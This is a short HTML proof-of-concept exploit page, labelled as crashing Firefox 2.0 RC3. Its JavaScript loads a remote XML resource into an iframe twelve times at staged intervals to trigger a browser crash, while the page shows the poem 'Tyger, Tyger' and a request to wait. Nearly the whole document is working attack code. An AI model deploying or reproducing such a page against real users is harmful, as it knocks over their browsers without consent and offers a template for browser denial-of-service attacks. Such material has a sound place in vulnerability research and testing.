PoC exploit that crashes Firefox 2.0 RC3.
878f9bc75b0b058d46eff79e443de4b33438666152aee9d3cc5eb2ccd887164d
<html>
<body bgcolor=black text=white onload="javascript:foo()">
<script>
<!--
counter = 0;
function foo() {
if (counter < 12) {
document.getElementById('foo').src = "http://lcamtuf.coredump.cx/ffoxdie.xml?" +Math.random();
if (counter >= 9) setTimeout('foo()',3000);
else if (counter >= 6) setTimeout('foo()',200);
else setTimeout('foo()',1000);
counter++;
} else {
document.getElementById('foo').src = "http://lcamtuf.coredump.cx/ffoxdie_ok.html";
}
}
// -->
</script>
<img src="http://lcamtuf.coredump.cx/photo/current/ula4-6.jpg" style="border-style: solid; border-width: 1px; border-color: #804040" align=right>
<font face="tahoma, helvetica, arial">
<font color=lightblue>
Tyger, Tyger. burning bright<br>
In the forests of the night,<br>
What immortal hand or eye<br>
Could frame thy fearful symmetry?
</font>
<p>
<b>Please wait approx. 20 seconds...</b>
<br>
<iframe id=foo>
</iframe>
<p>
<font color=gray>
Javascript is required.<br>
Firefox is required.<br>
May fail on a spotty link.<br>
Common sense is advised.<br>
<p>
<font size=-2 color=yellow>
If you encounter a call stack overflow,
try <a href=/ffoxdie2.html>this version</a> instead.
</font>
<p>
More photos: <a href=/photo/current/>click here</a>
</font>
</font>
</body>
</html>